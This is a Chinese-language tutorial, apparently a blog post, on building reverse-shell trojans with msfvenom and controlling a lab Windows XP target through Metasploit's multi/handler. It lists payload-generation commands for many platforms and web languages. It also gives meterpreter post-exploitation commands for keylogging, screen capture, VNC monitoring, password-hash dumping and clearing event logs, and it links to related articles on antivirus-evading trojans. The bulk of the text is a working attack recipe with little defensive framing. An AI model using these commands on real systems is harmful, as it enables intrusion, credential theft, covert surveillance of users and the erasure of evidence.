反弹shell原理:

反弹shell是指控制端监听某个TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出传递到控制端的过程。

工具

msfvenom:“msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线. 目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线.”
msfconsole:msfconsole是msf的命令行交互界面。在msfconsole中,可以实现对msf的完美操作,是一个msf的一体化操作接口,可以完全地利用msf中的各种功能,使用msfconsole特定的命令进行操作

虚拟机准备

攻击机:kali 192.168.31.24
靶机:winXP 192.168.31.141

攻击过程

各种系统对应的马

Linuxmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elfWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exeMacmsfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb PayloadsPHPmsfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.phpASPmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.aspJSPmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jspWARmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war Scripting PayloadsPythonmsfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pyBashmsfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.shPerlmsfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

使用msfvenom生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.24 LPORT=4444 -f exe -o app.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.24 LPORT=4444 -f exe > app.exe

启动msfconsole进入metasploit开始监听

进入监听模块

use exploit/multi/handler

设置payload反弹shell(使用和木马相同的payload)

set payload windows/meterpreter/reverse_tcp

设置LHOST、LPORT参数

set LHOST 192.168.31.24(本地IP)
set LPORT 4444(设置的端口)

查看设置是否成功

 show options

开始攻击

run
或者
exploit

出现该界面,表示渗透成功,可以对测试机进行一波操作了

meterpreter下的命令
getwd 当前目录
dir 查看所有文件
cat c:\123.txt 查看文件123.txt内容(数据是字符串传递,所以加一个转义字符\)
search -f cmd.exe (搜索名为cmd.exe文件所在目录)
upload /root/桌面/backldoor.exe(要上传的文件) -> c:\(上传到的目录) 上传文件
download c:\123txt /root 下载文件
clearev 清除日志
getuid 当前用户
ps 查看所用进程
kill 杀死某个进程
sysinfo 系统信息
键盘记录
keyscan_start 开始键盘记录
keyscan_dump 查看结果
keyscan_stop
屏幕截图
screenshot
屏幕监控
run vnc
获取密文密码
hashdump
获取shell,进入cmd
shell

获取权限之后的操作-博客

获取shell,进入cmd

①输入shell 进入目标主机的cmd命令行
②输入systeminfo 查看目标主机的系统信息
③Ctrl+C退出到meterprete命令行

执行meterprete命令

④hashdump 获取目标主机的明文密码
⑤run vnc 进行屏幕监控
⑥clearev 清除日志



利用msfvenom制作木马,并且反弹shell相关推荐

  1. 利用msfvenom生成木马文件反弹shell

    目录 1.安装靶机和攻击机 2.利用生成木马文件 3.msf里面开启监听 4.攻击成功且利用 5.meterpreter简单系统命令 1.安装靶机和攻击机 首先自己是在虚拟机完成的 靶场镜像地址MSD ...

  2. 利用msfvenom制作windows木马及免杀马

    实验环境:kali(10.250.70.251) Windows  x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows, ...

  3. 如何利用matrox mil在picturebox中显示image_利用自拍照反弹shell

    文章来源:洛米唯熊 0x00:前言 继前面讲到的用(看我如何利用微信反弹shell)之后,引来了很多人的围观.确实,新颖的利用方式.很有利用价值!闲话少说.今天,利用奇思妙想的方法来反弹shell.用 ...

  4. 「渗透」:一句话木马反弹shell的思路

    前提:现在情况是已经上传了一句话木马,可以执行命令如:ls,pwd,whoami等:问题在于,不管用python.bash还是perl都反弹不了,偷不了懒,就上msf把. http://target- ...

  5. msfvenom生成木马和内网穿透

    msfvenom命令行选项如下: 英文原版 中文版: Options: -p, --payload <payload> 指定需要使用的payload(攻击荷载).如果需要使用自定义的pay ...

  6. ac2100 反弹shell无法粘贴_记一次突破反弹shell

    背景 某天闲着无聊,小伙伴发来一个某网站,说只能执行命令,不能反弹shell. 测试 对着目标站点一顿测试. 发现确实存在shiro反序列化,并且存在可以利用的gadget.利用 发现确实可以执行命令 ...

  7. sqlplus中调用shell_记一次突破反弹shell

    这是 酒仙桥六号部队 的第 106 篇文章. 全文共计1809个字,预计阅读时长6分钟. 背景 某天闲着无聊,小伙伴发来一个某网站,说只能执行命令,不能反弹shell. 测试 对着目标站点一顿测试. ...

  8. 常见的反弹shell的方法以及对反弹shell的解释

    文章目录 一.什么是反弹shell,以及对反弹shell作用原理的解析: 3.反弹shell的本质 linux文件描述符 重定向 输入重定向 输出重定向 标准输出与标准错误输出重定向 文件描述符的复制 ...

  9. 网络安全-木马入侵windows -msfvenom反弹shell(CMD)

    网络安全-木马入侵windows -msfvenom反弹shell(CMD) 前言 一,我也是初学者记录的笔记 二,可能有错误的地方,请谨慎 三,欢迎各路大神指教 四,任何文章仅作为学习使用 五,学习 ...

最新文章

  1. 智能经济的动力,从人工智能到超级智能
  2. 打印当前时间 毫秒_时间轮定时器
  3. 信息基础---LDPCcodes随机矩阵构造java项目源代码
  4. ssdb php客户端接口文档
  5. python中那纠结的os.system()与空格处理
  6. 跟我一起学Redis之五种基本类型及其应用场景举例(干了6个小时)
  7. 太可怕了! 五一外出还敢连WiFi?
  8. asterisk meetme 会议实现
  9. Word图片保存后失真(变模糊)解决方法
  10. 【LWP,进程,线程】Linux
  11. 解决VS Community“无法刷新此账户的凭证”和“无法添加此账户”的问题
  12. LeetCode 题解之 824. Goat Latin
  13. 【代码审计】iCMS_v7.0.7 keywords.admincp.php页面存在SQL注入漏洞分析
  14. flex开发包二——flare
  15. (转载)BOX2D V2.3.0 用户手册中文版(第2章)-Hello Box2D
  16. linux压缩命令讲解,Linux下的压缩解压缩命令详解
  17. VS2019 使用GIT
  18. 华章IT图书书讯(2012年第3期)
  19. 【架构设计】酒店预订应用程序的系统设计架构(如 Airbnb、OYO)
  20. 【5G核心网】控制面与用户面协议栈

热门文章

  1. Android Studio [真机测试/开发者模式]
  2. GlusterFS基础知识
  3. 苹果个性化广告不再默认开启,iOS15用户拥有选择权
  4. 制作视频中的字幕很麻烦?一个免费工具帮你搞定!
  5. 用AI监控员工制作披萨,这样的“丧心病狂”你接受吗
  6. EFI系统分区必须挂载到/boot/efi其中之一如下的错误搞了好久终于搞定了!
  7. 电脑金山毒霸彻底卸载的方法
  8. python实验四:聚类模型KMeans算法及其评价
  9. 罗技G300s(好物分享)
  10. linux shell 指令 awk 是什么意思